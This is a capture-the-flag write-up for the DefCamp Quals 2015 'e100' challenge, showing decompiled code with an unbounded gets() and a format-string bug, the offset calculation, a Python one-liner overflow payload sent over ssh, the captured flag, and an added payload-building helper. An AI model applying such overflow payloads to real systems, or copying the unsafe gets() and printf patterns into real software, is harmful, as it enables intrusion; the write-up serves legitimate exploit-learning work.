Tags: bufferoverflow 

[](ctf=defcamp-quals-2015)
[](type=exploit)
[](tags=buffer-overflow)

We are given a [binary](../e100.bin) and a [key](../id_rsa_e100).

```bash
$ file e100.bin
e100.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4410355efef2e99ac54e4028dba1b3e40d055fee, stripped
```
Loading it in gdb-peda to check the protections:
```bash
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
```
Good. Loading the binary in [Hopper](http://www.hopperapp.com/) and decompiling.
```c
function sub_80484fd {
    var_C = *0x14;                       // copy of the stack canary (gs:0x14) at ebp-0xc
    printf("Enter password: ");
    gets(var_2C);                        // unbounded read into a stack buffer at ebp-0x2c
    if (arg0 == 0xbadb0169) {            // arg0 lives at ebp+0x8, above the buffer, canary and return address
        system("cat flag");
    }
    else {
        for (var_30 = 0x0; var_30 < strlen(var_2C); var_30 = var_30 + 0x1) {
            *(int8_t *)(var_30 + var_2C) = arg0 ^ *(int8_t *)(var_30 + var_2C) & 0xff;
        }
        printf("Your new secure password is: ");
        printf(var_2C);                  // user-controlled format string
    }
    eax = var_C ^ *0x14;                 // canary check happens only here, on return
    COND = eax == 0x0;
    if (!COND) {
        eax = __stack_chk_fail();
    }
    return eax;
}
```
So a `gets` into a stack buffer and a hardcoded compare against a function argument. Basic buffer overflow!!

```bash
0x804851b: lea eax,[ebp-0x2c]
0x804851e: mov DWORD PTR [esp],eax
=> 0x8048521: call 0x80483a0 <gets@plt>
0x8048526: cmp DWORD PTR [ebp+0x8],0xbadb0169
```
The buffer starts at `ebp-0x2c` and `arg0` sits at `ebp+0x8`, so the padding is 0x2c+0x8 = 52 bytes. The canary copy at `ebp-0xc` gets overwritten on the way, but the check only runs when the function returns, after `system("cat flag")` has already executed.
Now the final blow.
```bash
$ python -c "print 'A'*52+'\xba\xdb\x01\x69'[::-1]" | ssh -i id_rsa_e100 [email protected]
Pseudo-terminal will not be allocated because stdin is not a terminal.
DCTF{3671bacdb5ea5bc26982df7da6de196e}
Enter password: *** stack smashing detected ***: /home/dctf/e100 terminated
```
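To make the offset arithmetic and the "flag before stack smashing detected" ordering explicit, here is an added helper (not part of the original writeup) that parses the two gdb lines above into frame offsets, builds the same 56-byte input, and lists which frame slots that write overruns. The canary, saved ebp and return address offsets are the usual i386 layout implied by the decompilation, assumed here.

```python
import re
import struct

# The gdb lines from the writeup, embedded as the sample input.
DISASM = """\
0x804851b: lea eax,[ebp-0x2c]
0x804851e: mov DWORD PTR [esp],eax
=> 0x8048521: call 0x80483a0 <gets@plt>
0x8048526: cmp DWORD PTR [ebp+0x8],0xbadb0169
"""

# Other ebp-relative slots: the canary copy is var_C in the decompilation,
# the saved ebp and return address sit above it (assumed standard layout).
CANARY_OFF, SAVED_EBP_OFF, RET_OFF = -0x0c, 0x0, 0x4

def parse_frame(disasm):
    """Pull the gets() buffer offset, the compared argument's offset and
    the expected constant out of the lea/cmp lines."""
    buf_m = re.search(r"lea\s+eax,\[ebp([+-]0x[0-9a-f]+)\]", disasm)
    cmp_m = re.search(r"cmp\s+DWORD PTR \[ebp([+-]0x[0-9a-f]+)\],(0x[0-9a-f]+)", disasm)
    if not (buf_m and cmp_m):
        raise ValueError("lea/cmp pattern not found")
    return int(buf_m.group(1), 16), int(cmp_m.group(1), 16), int(cmp_m.group(2), 16)

def padding(buf_off, target_off):
    """Bytes from the start of the buffer to a given ebp-relative slot."""
    return target_off - buf_off

def build_payload(buf_off, arg_off, value):
    """Filler up to the argument slot, then the value little-endian
    (the same bytes as '\\xba\\xdb\\x01\\x69'[::-1] in the writeup)."""
    return b"A" * padding(buf_off, arg_off) + struct.pack("<I", value)

def clobbered_slots(buf_off, payload_len):
    """Frame slots that a gets() of payload_len bytes (plus its NUL) overruns.
    The canary is among them, but __stack_chk_fail only runs at return,
    after system("cat flag"): hence the flag prints before the abort."""
    end = buf_off + payload_len + 1          # +1 for the NUL gets() appends
    slots = {"canary": CANARY_OFF, "saved_ebp": SAVED_EBP_OFF, "ret": RET_OFF}
    return sorted(name for name, off in slots.items() if off < end)

if __name__ == "__main__":
    buf_off, arg_off, magic = parse_frame(DISASM)
    payload = build_payload(buf_off, arg_off, magic)
    print(padding(buf_off, arg_off), payload, clobbered_slots(buf_off, len(payload)))
```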

Flag:
>DCTF{3671bacdb5ea5bc26982df7da6de196e}

Original writeup (https://github.com/ByteBandits/writeups/tree/master/defcamp-quals-2015/exploit/e100/sudhackar).